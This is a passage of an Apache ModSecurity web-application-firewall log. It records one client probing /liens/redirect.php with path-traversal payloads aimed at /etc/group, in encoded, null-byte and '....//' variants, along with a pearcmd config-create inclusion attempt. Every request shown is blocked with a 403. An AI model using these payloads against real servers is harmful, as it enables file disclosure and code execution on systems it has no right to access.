[Tue May 12 05:32:44.255674 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigjwAAAFU"]
[Tue May 12 05:32:44.255749 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigjwAAAFU"]
[Tue May 12 05:32:44.255817 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigjwAAAFU"]
[Tue May 12 05:32:44.256489 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigjwAAAFU"]
[Tue May 12 05:32:44.256754 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigjwAAAFU"]
[Tue May 12 05:32:44.395234 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.395280 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.395491 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.395524 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.395564 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=....//....//....//....//....//....//....//....//....//....//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.395642 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ..../..../..../..../..../..../..../..../..../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.396318 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 28)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.396552 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 28 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkAAAAFU"]
[Tue May 12 05:32:44.535236 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd&+config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkQAAAFU"]
[Tue May 12 05:32:44.535301 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkQAAAFU"]
[Tue May 12 05:32:44.535357 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd& config-create"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkQAAAFU"]
[Tue May 12 05:32:44.544733 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkQAAAFU"]
[Tue May 12 05:32:44.544983 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkQAAAFU"]
[Tue May 12 05:32:44.683557 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkgAAAFU"]
[Tue May 12 05:32:44.684165 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkgAAAFU"]
[Tue May 12 05:32:44.684398 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkgAAAFU"]
[Tue May 12 05:32:44.822926 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkwAAAFU"]
[Tue May 12 05:32:44.822982 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkwAAAFU"]
[Tue May 12 05:32:44.823190 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: /etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkwAAAFU"]
[Tue May 12 05:32:44.823750 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkwAAAFU"]
[Tue May 12 05:32:44.824004 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizezigkwAAAFU"]
[Tue May 12 05:32:44.962437 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:44.962504 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:44.962537 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:44.962590 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:44.963173 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:44.963418 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXNr1yOh9TvizeziglAAAAFU"]
[Tue May 12 05:32:45.102025 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102069 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKfXdr1yOh9TvizeziglQAAAFU"]
[Tue May 12 05:32:45.102246 2026] [security2:error] [pid 1825179:tid 1825219] [client 66.170.6.170:13003] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F..%2F..%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] 